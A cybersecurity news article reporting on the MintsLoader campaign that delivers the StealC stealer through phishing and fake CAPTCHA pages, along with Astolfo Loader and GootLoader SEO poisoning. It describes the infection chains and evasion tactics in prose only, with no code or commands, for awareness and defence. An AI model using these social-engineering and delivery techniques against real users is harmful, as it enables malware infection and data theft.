Cybersecurity experts have uncovered a sophisticated cyberattack campaign utilising a malware loader dubbed “MintsLoader” to deliver harmful payloads, including the StealC information stealer and an open-source platform called BOINC. This campaign has primarily targeted critical sectors such as energy, legal services, and oil and gas industries in both the U.S. and Europe.
MintsLoader – A PowerShell-Based Threat
According to a recent analysis by cybersecurity firm eSentire, MintsLoader is a PowerShell-based malware loader distributed through phishing emails. These emails contain links leading to deceptive ClickFix or KongTuke pages or deliver a malicious JavaScript file as an attachment.
The attacks, first detected in early January 2025, highlight an increasing trend in leveraging fake CAPTCHA verification prompts to deceive users. These prompts instruct victims to execute malicious PowerShell scripts, circumventing security measures through manual input.
Fake Verification Tactics with KongTuke
A core technique exploited by the attackers is KongTuke—a method that injects malicious scripts into fake “verify you are human” CAPTCHA pages. Victims unknowingly copy and execute these scripts via their Windows Run prompt, triggering the attack chain.
In similar campaigns analyzed by Palo Alto Networks Unit 42, these deceptive pages preload the victim’s Windows clipboard with malicious scripts and provide detailed steps to execute them. This calculated approach demonstrates the lengths attackers go to manipulate unsuspecting users.
The Infection Process
The infection begins when a victim clicks on a phishing link, which either downloads an obfuscated JavaScript file or redirects to a ClickFix-style page. The JavaScript executes a PowerShell command to download and run MintsLoader via curl before erasing itself to cover its tracks.
Once executed, MintsLoader establishes contact with a command-and-control (C2) server, retrieving further PowerShell payloads designed to evade detection. This includes sandbox detection mechanisms and a Domain Generation Algorithm (DGA), which dynamically generates C2 domain names based on the current date.
StealC: The Payload of Choice
The campaign’s primary payload is StealC, a notorious information stealer operating under a malware-as-a-service (MaaS) model since 2023. StealC, believed to be a re-engineered version of the Arkei stealer, includes a unique feature—it avoids infecting devices located in Russia, Ukraine, Belarus, Kazakhstan, or Uzbekistan, suggesting a deliberate targeting strategy.
Astolfo Loader
The discovery of the MintsLoader campaign coincides with the emergence of Astolfo Loader, an updated version of JinxLoader. Initially written in Go, the malware’s latest version (dubbed Jinx V3) has been rewritten in C++ for enhanced performance.
BlackBerry researchers revealed that the original JinxLoader’s author, Rendnza, sold its source code to two separate buyers—Delfin and AstolfoLoader. Delfin continues to offer the unaltered JinxLoaderV2, while AstolfoLoader has rebranded and optimized the tool as Jinx V3. This underscores the rapid proliferation of malware tools, often sold affordably on public hacking forums accessible to virtually anyone.
SEO Poisoning with GootLoader
Additionally, researchers have spotlighted another ongoing threat: GootLoader malware campaigns. These campaigns exploit search engine optimization (SEO) poisoning to redirect victims searching for specific documents to compromised WordPress sites.
Once a victim lands on an infected site, they are presented with a realistic fake forum page prompting them to download a malicious file disguised as the requested content. The compromised WordPress sites dynamically load this fake page from an external “mothership” server, often without the website owner’s awareness.
GootLoader employs additional evasion tactics such as geofencing, IP-based restrictions, and a one-visit-per-day rule for infected sites. These measures make detection and analysis exceptionally challenging, even for the original site owners.
